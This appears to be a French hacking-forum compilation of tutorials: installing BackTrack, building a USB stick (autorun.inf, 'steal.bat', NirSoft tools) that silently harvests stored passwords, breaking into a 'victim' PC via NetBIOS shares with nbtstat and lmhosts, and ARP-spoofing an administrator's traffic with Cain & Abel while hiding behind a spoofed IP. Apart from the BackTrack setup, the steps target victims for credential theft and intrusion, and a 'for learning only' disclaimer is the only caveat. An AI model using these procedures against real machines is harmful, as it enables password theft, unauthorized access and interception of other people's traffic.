Faiçal Le Presque Direct

Bonjour a Tous,
J’aimerais vous présenter BackTrack, Utiliser par de Nombreux Sécurité.

BackTrack, C’est quoi ?
BackTrack, est une version de Linux, ( Un système D’exploitation, OS ) L’objectif de ce système est de réunir des outils permettant de tester la Sécurité d’un Réseau, Il est bien entendu Utiliser par de nombreux Hackers.

Nous allons Apprendre comment Utiliser ce Systeme

I) Introduction

BackTrack est donc un système d’exploitation, Nous allons utiliser la Version 4 R1. Cette Version dispose d’un mode Graphique, d’un Navigateur Internet ( Mozilla Firefox etc…) , et pleins d’autres fonctionnalités disponible sous Ubuntu ou d’autres Variantes de Linux.
BackTrack n’est pas non plus une Solution Miracle pour le Hacking, il faut maitriser Linux pour pouvoir l’exploiter Pleinement.
Si vous debutez, vous faites le bon choix en l’utilisant, avec de bon Tuto sur le Net, On n’apprend très vite pour des résultats surprenants !

II) Installation

Nous allons rentré dans la Phase d’installation du Systeme D’exploitation… Vous devez probablement Utiliser Windows, Et changer de systeme d’exploitation, ce n’est pas toujours une bonne idée quand on sais le prix que l’on a payé pour pouvoir Utiliser Windows…
Nous allons aborder plusieurs Méthodes pour l’utiliser :
- Installer BackTrack sur une Partition de mon disque dur
- Installer BackTrack sur une clé USB ( Recommandé )
- Installer BackTrack sur un CD
- Utiliser BackTrack en Virtual Machine

1) Installer BackTrack sur une Partition de votre disque dur

Installer BackTrack sur une Partition de Votre disque dur vous permetteras de L’utiliser tout en gardant Windows, vous choisirez au démarrage quel System lancer.
Nous n’allons pas passé Beaucoup de temps sur cette Méthodes, elle est Pratique mais comporte des Incovéniants:
- Partitionnement du Disque en deux Parties
- Manipulations asses complexes pour les débutants

Pour ceux qui savent faire, il existe de Nombreux tuto sur Internet, Utiliser Google.
Voici L’ISO de BackTrack : http://www.backtrack-linux.org/downloads/
Dowload : BackTrack 4 R1 Release ISO

2) Installer BackTrack sur une Clé USB

Voici la Méthode pour laquelle J’ai Opté car elle simple et très Pratique : Vous pouvez emporter BackTrack avec vous Partout et l’utiliser sur N’importe quelle Machine.
Le Mode persistance vous permet de sauvegardés les modifications apportés a vos fichier et au Système
Pour ce faire vous devez disposer d’un clef USB de 2GB Minimum.
Télécharger Backtrack : http://www.backtrack-linux.org/downloads/
(BackTrack 4 R1 Release ISO)
Télécharger ensuite Linux Live Usb Creator Ici (Version 2.6 finale )

Une fois ces deux Téléchargements Effectues, Brancher Votre clef Usb.
>Executez Linux Live Usb Creator
> Choissisez Votre Clef USB
> Cliquer sur ISO/IMG , Puis choissiser L’image ISO de BackTrack
> Choissisez l’espace que vous desirer attribuer a vos fichier de Sauvegardes
> Cochez  » Cacher les fichier sur la cle »
> Cocher  » Formater en FAT32″ ( Les données présente sur votre clef sureons perdues )
> La dernière case est Optionelle, faites comme vous désirer… elle Permet seulement de pouvoir lancer Votre version de Backtrack sur Windows
> Cliquer ensuite sur L’Eclaire pour Commencer l’installation sur Votre clé

Une fois le Processus Terminé, vous pouvez retirer votre Clé.

3) Installer BackTrack sur un CD

Cette Méthode n’est vraiment pas Intéressante, Il est Impossible de sauvegarder vos données, et les CD ne sont pas effaçables.
Si vous désirez utiliser cette Méthode, il vous suffit de graver L’ISO sur le CD et Booter votre PC dessus.

Télécharger Backtrack : http://www.backtrack-linux.org/downloads/
(BackTrack 4 R1 Release ISO)

4) Installer BackTrack sur une machine Virtuelle

Méthode Pratique pour les Habitués de Windows, c’est L’executer en Virtual Machine.
Pour ceux qui ne connaisse pas je vous invite a vous rensseigner sur ce Procédé.
Pour L’utiliser dans Windows en Machine Virtuel, vous devez avoir un « Emulateur », si vous n’en avez pas, je vous conseil VirtualBox
Lien: http://www.virtualbox.org/

Télécharger l’ISO de Backtrack : http://www.backtrack-linux.org/downloads/
(BackTrack 4 R1 Release ISO)

Recherchez ensuite des Tutos pour la configuration de votre Machnie Virtuelle ( http://www.zebulon.fr/dossiers/83-tutori…uelle.html

III)Utilisation

On va pouvoir commencer a S’amuser !
Si vous Utiliser une CleUSB, un CD ou que vous avez utiliser une Partition de votre Disque : Ouvrer le Menu de Boot au Démarrage, ( F12 dans sur la plupart des PC )
Choisissez ensuite votre type de Boot ( Hard Disk USB ou USB flash Device pour ceux qui ont des clés )

Et ca démarre ! Magiique !

NOTE : Pour ceux qui ont des Clé USB, vous aurrez probablement un Pannel vous proposant pulieurs Options de Démarrage comme celui ci :

Choissisez : « Start Persistant Live CD »

A Partir de Maintenant, les Utilisateurs de Virtual Machines peuvent nous rejoindre pour la suite de ce Tuto.

> Apprès un petit Moment d’attente, pleins de Lettres ce sont afficher.
Il y’a marquer, en bas : root@bt

Taper : startx
( Taper le Q pour Faire A si vous avez un clavier azerty )

Et Biiiimmm ! Bienvenu dans le Fabuleux monde de BackTrack !

Se connecter au Réseau Wifi :

J’ai un peu Galérer pour me connecter au Début, donc je vais vous guider.

Ouvrer le Menu, faites « Internet » puis « Wicd Network Manager »
Choissisez votre Réseau, entrez la clé de Sécurisée et Hop !

( Certaines Carte Réseau ne sont pas détectée, rendez vous dans la Doc Linux pour installer des Drivers )

Je vous laisse découvrir BackTrack… Je posterais des Tutos pour l’utilisation des Logiciels dans la Section Linux de Ce Forum.

Liens Utiles :
Site Officiel : http://www.backtrack-linux.org/
Communautée Francophone : http://backtrack-fr.net/

Ce tuto est bien entendu disponible Uniquement à des fin apprentissage

- MessenPass
- ChromePass
- Iepv
- Mailpv
- mspass
- netpass
- passwordFox
- pspv

Tous ces programmes sont des logiciels de récupération de mots de passe stockés sur le pc, disponibles sur le site de nirsoft

Si vous voulez récupérer des mots de passes bien précis , vous n’êtes pas obligés de télécharger l’ensemble des logiciels citez ci-dessus.

Exemple : Vous voulez récupérez seulement une adresse de messagerie ?
Alors il vous suffit seulement de télécharger MessenPass .

1ere Etape :

Il nous faut créé un Fichier Bat qui nous ouvrira les programmes de récupération de mot de passe et nous stockera les résultats dans un fichier texte
Pour cela :Ouvrir un nouveau document texte ( notepad ou autres)

Ecrire le code ci-dessous

Renommer ceci en steal.bat

2eme Etape :

Comme vous avez pu le voir dans les lignes ci dessus
Lorsque le logiciel sera exécutez , ces logs seront envoyé dans un dossier appelé Mdp .
Il nous faut donc créé un nouveau dossier Mdp ( tous le monde sait le faire je suppose )

3eme Etape :

Lorsque vous insérez votre cléf USB généralement une fenêtre apparait en nous demandant ce que l’on désire faire !
Dans cette étape nous allons créé une nouvelle option dans cette fenêtre , qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes du pc et de les stockés dans le dossier Mdp créé dans l’étape 2 .

Pour réalisez ceci ouvrir un nouveau document texte .

Puis insérez ce code :

Puis enregistrez sous : autorun.inf

4eme Etape :

Voila on arrive à la derniere étape , l’ultime étape je dirai …
C’est la plus facile ( d’ailleurs aucune étape n’étais difficile pour ainsi dire)
On va devoir mettre tous sur une clef usb

Wahouuuuu c’est trop dure , comment on fait ?
Je suis la les amis , je vous explique tout en détail .

Alors ouvrez votre cléf usb et inserez tout ce que vous avez télécharger et créé c’est à dire :

Si vous avez téléchargez tous les programmes et bien suivi toutes les étapes vous devez vous retrouvez avec tout ceci dans votre cléf USB .

- Autorun.inf
- ChromePass.exe
- Iepv.exe
- Mailpv.exe
- mspass.exe
- netpass.exe
- passwordFox.exe
- pspv.exe
- steal.bat
- Mdp ( c’est le dossier )

Si vous disposez de tout ceci .
Allez-y vous pouvez essayer

Pour les flémards :

Voici le Packs complets : http://www.multiupload.com/V3SVE93XY0

Fin du tutorial.

Ce tuto est bien entendu disponible Uniquement à des fin apprentissage

Pirater PC a distance avec Ms-dos

Avant de commencer

Avant tout il faut vous assurez que vous aillez activé le partage de fichiers microsoft.Pour se faire allez dans « panneau de configuration », »Réseau », »Partage de fichiers et d’imprimantes » et cochez la case « Permettre à d’autres utilisateurs d’accéder à mes fichiers », cliccez sur OK et redémarrer votre pc.Biensûr il faut impérativement connaître l’ip de la victime!

C’est parti!

Alors,pour commencer ouvrez l’invite de commandes Ms-dos,dans ce cas l’ip de la victime est 154.264.24.2 mais vous vous devrez la remplacée par celle de votre victime biensûr.Dans la fenêtre qui s’est ouverte tappez nbtstat -a ip de la victime=nbtstat -a 154.264.24.2, une liste apparaîtra avec quelques noms marqués à gauche entre des <> ici ça sera <toni> et à côté il y a <00>,<01> etc.Si vous voyez <20> et à gauche le nom de la machine exemple:<toni> <20>,le tour est joué sinon vous pouvez laissez tomber.
Si tout s’est bien passez jusqu’à maintenant,toujours sur la même fenêtre tappez edit imhost et ensuite écrivez « 154.264.24.2 toni #PRE » allez ensuite sur fichier et cliccez sur enregistrer. Retournez sur la fenêtre dos(noire) et tappez nbtstat -r un truc du genre apparaîtra « Successfully remote cache name table » ensuite quittez ms-dos.Maintenant allez sur Démarrer->rechercher->un ordinateur et entrez le nom que vous avez obtenu,dans ce cas le nom est toni. Cliquez sur rechercher et si l’ordinateur apparait dans la recherche cliccez dessus et voila!Faites ce que vous voulez!

Source : http://johnhack.ifrance.com

bonjour , aujourd’hui je vous présente ma trouvaille c’est a dire le spoofing avec cain et abel

Ce tuto est bien entendu disponible Uniquement à des fin apprentissage

ce tuto se décompose en 3 partie : L’arp spoofing ?
La demarche
La preuve

Nb: si vous n’avez pas cain et abel regardez ICI

L’arp spoofing?

Le protocole ARP (Address Resolution Protocol) implémente le mécanisme de résolution d’une adresse IP en une adresse MAC Ethernet. Les équipements réseaux communiquent en échangeant des trames Ethernet (dans le cas d’un réseau Ethernet bien sûr) au niveau de la couche liaison de données. Pour pouvoir échanger ces informations il est nécessaire que les cartes réseau possèdent une adresse unique au niveau Ethernet, il s’agit de l’adresse MAC (Media Access Control).

Quand un paquet IP doit être envoyé la machine expéditrice a besoin de l’adresse MAC du destinataire. Pour cela une requête ARP en broadcast est envoyée à chacune des machines du réseau physique local. Cette requête pose la question : « Quelle est l’adresse MAC associée à cette adresse IP ? ». La machine ayant cette adresse IP répond via un paquet ARP, cette réponse indiquant à la machine émettrice l’adresse MAC recherchée. Dés lors, la machine source possède l’adresse MAC correspondant à l’adresse IP destination des paquets qu’elle doit envoyer. Cette correspondance sera gardée pendant un certain temps au niveau d’un cache (pour éviter de faire une nouvelle requête à chaque paquet IP envoyé).

Cette attaque corrompt le cache de la machine victime. Le pirate envoie des paquets ARP réponse à la machine cible indiquant que la nouvelle adresse MAC correspondant à l’adresse IP d’une passerelle ou d’un proxy (par exemple) est la sienne. La machine du pirate recevra donc tout le trafic à destination de la passerelle, il lui suffira alors d’écouter passivement le trafic (et/ou le modifier). Il routera ensuite les paquets vers la véritable destination.

Tout ça paraît bien technique mais ce type d’attaque n’est pas réservé aux ceintures noires en réseau, loin de là. Il existe maintenant des applications qui permettent de faire tout ceci les doigts dans le nez et met en danger votre réseau.

La démarche

Lancez Cain. Dés la première ouverture on peut se rendre compte des multitudes de fonctionnalités que possède Cain.

On va tout d’abord voir si votre réseau est protégé ou non contre les attaques par arp spoofing.

1. Placez vous sur l’onglet Sniffer
2. Activez le sniffer
3. Appuyez sur Ajouter

La popup du scanner d’adresse MAC apparaît. Ici vous pouvez spécifier si vous voulez scanner tout votre sous réseau ou bien spécifier un range d’adresse ip. Les options complémentaires concernent les tests d’arp. Pour le premier scan ne saisissez pas ces options de test car elles sont relativement longues à effectuer.

Validez le scan et vous verrez toutes les machines de votre réseau apparaître.

Maintenant le grand test. Appuyez de nouveau sur ajouter, sélectionnez range et saisissez l’adresse de votre proxy ou d’une passerelle et cochez « all test ». Validez et attendez que Cain termine ses tests.
Le résultat s’affiche en bout de ligne. Si vous avez ne serait-ce qu’une étoile dans les cases suivantes, vous pouvez commencer à trembler car votre réseau est bel et bien sensible aux attaques ARP spoofing.

Cliquez sur configuration.

Une popup apparaît. Sélectionnez l’onglet APR et entrez une spoofed ip (une adresse qui n’existe pas bien sûr). Tout ceci pour éviter d’être repéré sur le réseau. Validez vos modifications. Placez vous sur l’onglet (en bas) APR.

Appuyez sur la croix bleue (add to list). Une popup apparaît dans la liste de gauche choisissez l’adresse IP de votre adminisrateur réseau et dans la fenêtre de droite votre proxy ou votre passerelle pour internet. Validez et appuyez sur le bouton jaune (start / stop APR). Vous venez d’activez l’arp spoofing entre lui et le proxy.

La preuve

avant de faire l’arp faite executer–>cmd–>arp -a et vous verrez 2 adresse
après la manip refaite la meme choses et vous verrez ce qui se passe

voila voici la fin de ce tuto

R: ce tuto n’est pas de moi. Il provient du site domlike
mais comme je n’ai pas vu de tuto sur arp sur ce forum je me disais que c’était interessant de poster